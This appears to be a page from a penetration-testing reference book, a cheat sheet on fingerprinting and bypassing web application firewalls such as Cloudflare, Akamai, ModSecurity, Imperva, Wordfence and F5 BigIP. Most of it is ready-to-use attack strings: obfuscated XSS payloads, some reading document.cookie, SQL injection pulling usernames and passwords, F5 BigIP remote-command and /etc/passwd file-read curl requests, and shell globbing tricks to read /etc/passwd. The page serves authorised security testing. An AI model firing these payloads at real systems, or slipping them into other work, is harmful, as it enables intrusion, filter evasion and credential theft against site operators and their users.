Pentest Book
Search…
WAFs

Tools

1
whatwaf https://example.com
2
wafw00f https://example.com
3
4
# https://github.com/vincentcox/bypass-firewalls-by-DNS-history
5
bash bypass-firewalls-by-DNS-history.sh -d example.com
6
7
# Bypasser
8
# https://github.com/RedSection/pFuzz
9
10
# Domain IP history
11
https://viewdns.info/iphistory/
12
13
# Bypasses and info
14
https://github.com/0xInfection/Awesome-WAF
15
https://github.com/waf-bypass-maker/waf-community-bypasses
Copied!
1
# Manual identification
2
dig +short target.com
3
curl -s https://ipinfo.io/<ip address> | jq -r '.com'
4
5
# Always check DNS History for original IP leak
6
https://whoisrequest.com/history/
7
8
# Waf detection
9
nmap --script=http-waf-fingerprint victim.com
10
nmap --script=http-waf-fingerprint --script-args http-waf-fingerprint.intensive=1 victim.com
11
nmap -p80 --script http-waf-detect --script-args="http-waf-detect.aggro " victim.com
12
wafw00f victim.com
13
14
# Good bypass payload:
15
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)
16
javascript:”/*’/*`/* →<html \” onmouseover=/*&lt;svg/*/onload=alert()//>
17
18
# Bypass trying to access to :
19
dev.domain.com
20
stage.domain.com
21
ww1/ww2/ww3...domain.com
22
www.domain.uk/jp/
23
24
# Akamai
25
origin.sub.domain.com
26
origin-sub.domain.com
27
- Send header:
28
Pragma: akamai-x-get-true-cache-key
29
{{constructor.constructor(alert`1`)()}}
30
\');confirm(1);//
31
444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#
32
33
# ModSecurity Bypass
34
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
35
36
# Cloudflare
37
python3 cloudflair.py domain.com
38
# https://github.com/mandatoryprogrammer/cloudflare_enum
39
cloudflare_enum.py disney.com
40
https://viewdns.info/iphistory/?domain=domain.com
41
https://whoisrequest.com/history/
42
43
# Cloudflare bypasses
44
<!<script>alert(1)</script>
45
<a href=”j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this[‘document’][‘cookie’]&rpar;”>X</a>
46
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert'1';>
47
<select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x>
48
<a+HREF=’%26%237javascrip%26%239t:alert%26lpar;document.domain)’>
49
50
# Aqtronix WebKnight WAF
51
- SQLi
52
0 union(select 1,@@hostname,@@datadir)
53
0 union(select 1,username,password from(users))
54
- XSS
55
<details ontoggle=alert(document.cookie)>
56
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
57
58
# ModSecurity
59
- XSS
60
<scr%00ipt>alert(document.cookie)</scr%00ipt>
61
onmouseover%0B=
62
ontoggle%0B%3D
63
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(“123”)>
64
- SQLi
65
1+uni%0Bon+se%0Blect+1,2,3
66
67
# Imperva Incapsula
68
https://medium.com/@0xpegg/imperva-waf-bypass-96360189c3c5
69
url.com/search?search=%3E%3C/span%3E%3Cp%20onmouseover=%27p%3D%7E%5B%5D%3Bp%3D%7B%5F%5F%5F%3A%2B%2Bp%2C%24%24%24%24%3A%28%21%5B%5D%2B%22%22%29%5Bp%5D%2C%5F%5F%24%3A%2B%2Bp%2C%24%5F%24%5F%3A%28%21%5B%5D%2B%22%22%29%5Bp%5D%2C%5F%24%5F%3A%2B%2Bp%2C%24%5F%24%24%3A%28%7B%7D%2B%22%22%29%5Bp%5D%2C%24%24%5F%24%3A%28p%5Bp%5D%2B%22%22%29%5Bp%5D%2C%5F%24%24%3A%2B%2Bp%2C%24%24%24%5F%3A%28%21%22%22%2B%22%22%29%5Bp%5D%2C%24%5F%5F%3A%2B%2Bp%2C%24%5F%24%3A%2B%2Bp%2C%24%24%5F%5F%3A%28%7B%7D%2B%22%22%29%5Bp%5D%2C%24%24%5F%3A%2B%2Bp%2C%24%24%24%3A%2B%2Bp%2C%24%5F%5F%5F%3A%2B%2Bp%2C%24%5F%5F%24%3A%2B%2Bp%7D%3Bp%2E%24%5F%3D%28p%2E%24%5F%3Dp%2B%22%22%29%5Bp%2E%24%5F%24%5D%2B%28p%2E%5F%24%3Dp%2E%24%5F%5Bp%2E%5F%5F%24%5D%29%2B%28p%2E%24%24%3D%28p%2E%24%2B%22%22%29%5Bp%2E%5F%5F%24%5D%29%2B%28%28%21p%29%2B%22%22%29%5Bp%2E%5F%24%24%5D%2B%28p%2E%5F%5F%3Dp%2E%24%5F%5Bp%2E%24%24%5F%5D%29%2B%28p%2E%24%3D%28%21%22%22%2B%22%22%29%5Bp%2E%5F%5F%24%5D%29%2B%28p%2E%5F%3D%28%21%22%22%2B%22%22%29%5Bp%2E%5F%24%5F%5D%29%2Bp%2E%24%5F%5Bp%2E%24%5F%24%5D%2Bp%2E%5F%5F%2Bp%2E%5F%24%2Bp%2E%24%3Bp%2E%24%24%3Dp%2E%24%2B%28%21%22%22%2B%22%22%29%5Bp%2E%5F%24%24%5D%2Bp%2E%5F%5F%2Bp%2E%5F%2Bp%2E%24%2Bp%2E%24%24%3Bp%2E%24%3D%28p%2E%5F%5F%5F%29%5Bp%2E%24%5F%5D%5Bp%2E%24%5F%5D%3Bp%2E%24%28p%2E%24%28p%2E%24%24%2B%22%5C%22%22%2Bp%2E%24%5F%24%5F%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F%24%5F%5D%2Bp%2E%24%24%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5F%24%5F%2Bp%2E%5F%5F%2B%22%28%5C%5C%5C%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%5F%2Bp%2E%24%24%24%5F%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F%24%5F%5D%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F%24%5F%5D%2Bp%2E%5F%24%2B%22%2C%5C%5C%22%2Bp%2E%24%5F%5F%2Bp%2E%5F%5F%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%24%2Bp%2E%5F%24%5F%2Bp%2E%24%5F%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%24%24%5F%2Bp%2E%24%5F%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%5F%24%5F%2Bp%2E%5F%24%24%2Bp%2E%24%24%5F%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5F%24%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%5F%24%2Bp%2E%5F%5F%24%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5F%5F%5F%2Bp%2E%5F%5F%2B%22%5C%5C%5C%22%5C%5C%22%2Bp%2E%24%5F%5F%2Bp%2E%5F%5F%5F%2B%22%29%22%2B%22%5C%22%22%29%28%29%29%28%29%3B%27%3E
70
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
71
<img/src=q onerror='new Function`al\ert\`1\``'>
72
- Parameter pollution SQLi
73
http://www.website.com/page.asp?a=nothing'/*&a=*/or/*&a=*/1=1/*&a=*/--+-
74
http://www.website.com/page.asp?a=nothing'/*&a%00=*/or/*&a=*/1=1/*&a%00=*/--+-
75
-XSS
76
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
77
<img/src="x"/onerror="[7 char payload goes here]">
78
79
# FAIL2BAN SQLi
80
(SELECT 6037 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(6037=6037,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
81
82
# F5 BigIP
83
RCE: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
84
Read File: curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
85
- XSS
86
<body style="height:1000px" onwheel=alert(“123”)>
87
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow=alert(“123”)>
88
<body style="height:1000px" onwheel="[JS-F**k Payload]">
89
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[JS-F**k Payload]">
90
(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[]
91
)[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[
92
+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![
93
]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[
94
]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]
95
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
96
<div contextmenu="xss">Right-Click Here<menu id="xss" on-
97
show="prom%25%32%33%25%32%36x70;t(1)">
98
99
# More payloads
100
https://github.com/Walidhossain010/WAF-bypass-xss-payloads
101
102
# Wordfence
103
<meter onmouseover="alert(1)"
104
'">><div><meter onmouseover="alert(1)"</div>"
105
>><marquee loop=1 width=0 onfinish=alert(1)>
106
107
# RCE WAF globbing bypass
108
/usr/bin/cat /etc/passwd == /???/???/c?t$IFS/???/p?s?w?
109
cat /etc$u/p*s*wd$u
Copied!
Last modified 2mo ago
Export as PDF
Copy link